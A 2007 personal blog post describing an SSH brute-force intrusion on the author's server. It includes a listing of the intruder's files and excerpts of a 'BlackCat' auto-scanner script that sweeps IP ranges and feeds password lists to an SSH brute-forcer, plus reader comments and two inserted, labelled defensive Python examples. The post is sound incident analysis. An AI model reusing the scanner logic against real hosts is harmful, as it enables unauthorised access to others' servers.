Parsed Participle

The personal weblog of Faiz Kazi: Mostly oddities in programming, life in Japan, occasionally music.

[ Home | RSS 2.0 | ATOM 1.0 ]

Mon, 19 Nov 2007

Sod off, loathsome script-kiddie

Someone (or should I say, something, because this looks like some auto-scanning script) gained access via SSH using one of the unused user accounts on this server. Nothing very spectacular, especially since everything was easily visible with ps, and even who. The IP seems to be 86.123.17.188.

I could see this when I ran who:

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running. After summarily killing those off, I found and archived the offending scripts: these were stored in, and running from, the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password led to a brute-force SSH break-in. Not at all a bother, and nothing that can't be fixed with an iptables '-m recent' filter.
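The 'who' output above is all it took to spot the session. As an added example (not part of the original post), the script below parses lines in the format 'who' prints here and flags any session by an account that should not be logging in, or from an origin outside an allowlist; it also strips the display suffix (':S.0') that shows up on the intruder's line so the bare host can be matched. The expected-user set and the allowed domain suffix are assumptions for the demo, and the regular expression matches the classic 'Nov 19 13:56' date format shown above rather than the ISO date newer coreutils print.

```python
"""Flag interactive sessions that do not match what the admin expects.

Added example, not code from the blog post. EXPECTED_USERS and
ALLOWED_SUFFIXES below are assumptions for the demo.
"""
import re

# who(1) here prints: user  tty  Mon DD HH:MM (origin). The origin may carry
# a display suffix such as ":S.0", which is dropped before matching.
WHO_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+"
    r"(?P<when>\w{3}\s+\d{1,2}\s+\d{2}:\d{2})"
    r"(?:\s+\((?P<origin>[^)]*)\))?\s*$"
)


def parse_who_line(line):
    """Return a dict for one 'who' line, or None if the line does not parse."""
    m = WHO_LINE.match(line)
    if not m:
        return None
    origin = m.group("origin") or ""
    host = origin.split(":", 1)[0]   # "86.123.17.188:S.0" -> "86.123.17.188"
    return {"user": m.group("user"), "tty": m.group("tty"),
            "when": m.group("when"), "host": host}


def is_allowed_origin(host, allowed_suffixes):
    """True if host equals, or is a subdomain of, one of the allowed suffixes."""
    return any(host == s or host.endswith("." + s) for s in allowed_suffixes)


def flag_sessions(who_output, expected_users, allowed_suffixes):
    """Return (user, host, reasons) for every session that breaks a rule."""
    findings = []
    for line in who_output.splitlines():
        sess = parse_who_line(line)
        if sess is None:
            continue
        reasons = []
        if sess["user"] not in expected_users:
            reasons.append("unexpected account")
        if not is_allowed_origin(sess["host"], allowed_suffixes):
            reasons.append("origin not in allowlist")
        if reasons:
            findings.append((sess["user"], sess["host"], reasons))
    return findings


# The two lines quoted in the post, used here as sample input.
SAMPLE_WHO = """\
faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)
"""

# Assumed policy: only 'faiz' logs in interactively, and only from so-net.
EXPECTED_USERS = {"faiz"}
ALLOWED_SUFFIXES = ["so-net.ne.jp"]

if __name__ == "__main__":
    for user, host, reasons in flag_sessions(SAMPLE_WHO, EXPECTED_USERS,
                                             ALLOWED_SUFFIXES):
        print(f"{user} from {host}: {', '.join(reasons)}")
```

Run against a live box with who | python3 -c '...' or by reading 'who' output into flag_sessions; the point of keeping an explicit expected-user set is that unused accounts like 'vasanth' show up the moment they appear in a session list at all, regardless of where they came from.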

Contents of the directory the intruder was running the scripts from:
var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts. Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do.

$ cat /var/tmp/vi.recover/irc/go.sh
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# © ALL RIGHTS RESERVED TO Regele ©#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"

Yup, script 'kiddie' all right.

posted: 11:55 | path: /security
Posted by gavin8or at Mon Dec 10 13:07:56 2007
Hmm, are you sure that he simply accessed it using a weak password on a user account? I'm only wondering because I've seen this exact same script installed using a user account that didn't have a shell in /etc/passwd. I don't know...

Secondly, how was the exploiter able to run the script? It would seem that it has to be run as root? Did he somehow execute the script as root?

Posted by Faiz at Wed Dec 12 05:37:42 2007
Well, the script wasn't running as root, but as the user mentioned above... whose password was, sadly, the same as his username.

I'm not sure how the script kick-started itself. I'd meant to have a look at it and figure it out, but my attention span nipped that endeavor in the bud...

Posted by Jim McNamara at Sun Dec 30 20:28:14 2007
The same script got me this past week. I can guarantee it wasn't a brute-force ssh, as my servers are all set for no password authentication; they only accept key-based auth. The script came in as user www-data, which is the default Debian Apache user. There weren't any keys in the www-data home, so I'm mystified how they got in. In my case they hit 2 of my servers, and pushed the processors hard; top had outputs like 9.00 7.00 7.50 on dual processor machines, all from the ./ssh 150 process happening about 150-200 times. lsof showed a server in Germany, sub.something.de, which I forgot to document in my rush to secure things.

I didn't see anything done as root, which is good. I didn't have anything below /var/tmp/vi.recover, and the process I used to kill the ssh sessions (ps aux|grep www-data | cut -d ' ' -f 2 |xargs kill -15) erased all traces of whatever they did.
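Both the post ("after summarily killing those off, I found and archived the offending scripts") and the comment above (the kill sweep "erased all traces") run into the same problem: once the workers are gone, their executable, working directory and arguments are gone too. As an added example (not code from the post or the commenters), the script below walks a /proc-style tree and records pid, argv, executable and working directory for every process owned by a given uid, writes that to JSON, and collapses hundreds of identical './ssh 150' workers into one summary line, all before anything is terminated. The proc_root parameter and the build_fake_proc_tree helper are assumptions for the demo: they let the same code run against a constructed tree so the example works offline; on a real host you would call snapshot_user_processes with the intruder's uid and the default proc_root.

```python
"""Capture evidence about a user's processes before killing them.

Added example, not code from the blog post or its comments. The uid 1001,
the pids and the fake /proc tree below are constructed for the demo; the
paths mirror the ones named in the post.
"""
import json
import os
import tempfile


def _uid_from_status(status_text):
    # /proc/<pid>/status carries "Uid:\t<real>\t<effective>\t<saved>\t<fs>".
    for line in status_text.splitlines():
        if line.startswith("Uid:"):
            return int(line.split()[1])
    return None


def _readlink(path):
    try:
        return os.readlink(path)
    except OSError:
        return None          # kernel threads and zombies have no exe/cwd


def snapshot_user_processes(uid, proc_root="/proc"):
    """Return a list of dicts describing every process whose real uid is uid."""
    records = []
    for pid in sorted(int(n) for n in os.listdir(proc_root) if n.isdigit()):
        pdir = os.path.join(proc_root, str(pid))
        try:
            with open(os.path.join(pdir, "status")) as fh:
                if _uid_from_status(fh.read()) != uid:
                    continue
            with open(os.path.join(pdir, "cmdline"), "rb") as fh:
                argv = [a.decode("utf-8", "replace")
                        for a in fh.read().split(b"\0") if a]
        except OSError:
            continue         # process exited mid-walk or is unreadable
        records.append({"pid": pid, "argv": argv,
                        "exe": _readlink(os.path.join(pdir, "exe")),
                        "cwd": _readlink(os.path.join(pdir, "cwd"))})
    return records


def summarize(records):
    """Collapse identical workers into a mapping (exe, cwd) -> count."""
    counts = {}
    for r in records:
        key = (r["exe"], r["cwd"])
        counts[key] = counts.get(key, 0) + 1
    return counts


def write_evidence(records, path):
    """Persist the snapshot as JSON; do this before any kill."""
    with open(path, "w") as fh:
        json.dump(records, fh, indent=2)
    return path


def build_fake_proc_tree(entries):
    """Constructed stand-in for /proc: entries are (pid, uid, argv, exe, cwd)."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    for pid, uid, argv, exe, cwd in entries:
        pdir = os.path.join(root, str(pid))
        os.mkdir(pdir)
        with open(os.path.join(pdir, "status"), "w") as fh:
            fh.write(f"Name:\t{os.path.basename(exe)}\n"
                     f"Uid:\t{uid}\t{uid}\t{uid}\t{uid}\n")
        with open(os.path.join(pdir, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")
        os.symlink(exe, os.path.join(pdir, "exe"))   # dangling links are fine
        os.symlink(cwd, os.path.join(pdir, "cwd"))
    open(os.path.join(root, "self"), "w").close()   # non-numeric entry, skipped
    return root


# Constructed sample modelled on the post: two './ssh 150' workers owned by
# the compromised account (uid 1001 assumed) and one root-owned sshd.
SAMPLE_PROCS = [
    (4101, 1001, ["./ssh", "150"], "/var/tmp/vi.recover/irc/ssh", "/var/tmp/vi.recover/irc"),
    (4102, 1001, ["./ssh", "150"], "/var/tmp/vi.recover/irc/ssh", "/var/tmp/vi.recover/irc"),
    (611, 0, ["/usr/sbin/sshd"], "/usr/sbin/sshd", "/"),
]

if __name__ == "__main__":
    root = build_fake_proc_tree(SAMPLE_PROCS)
    recs = snapshot_user_processes(1001, proc_root=root)
    write_evidence(recs, os.path.join(root, "evidence.json"))
    for (exe, cwd), n in summarize(recs).items():
        print(f"{n:4d} x {exe} (cwd {cwd})")
    # Only after evidence.json exists would one walk recs and terminate each
    # pid with os.kill(pid, signal.SIGTERM).
```

The summary is what tells you in one line that every worker is the same binary running from the same odd directory (here /var/tmp/vi.recover/irc), which is exactly the lead that the post's author had to recover by hand after the fact; the JSON keeps the individual pids and argument lists for the write-up.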
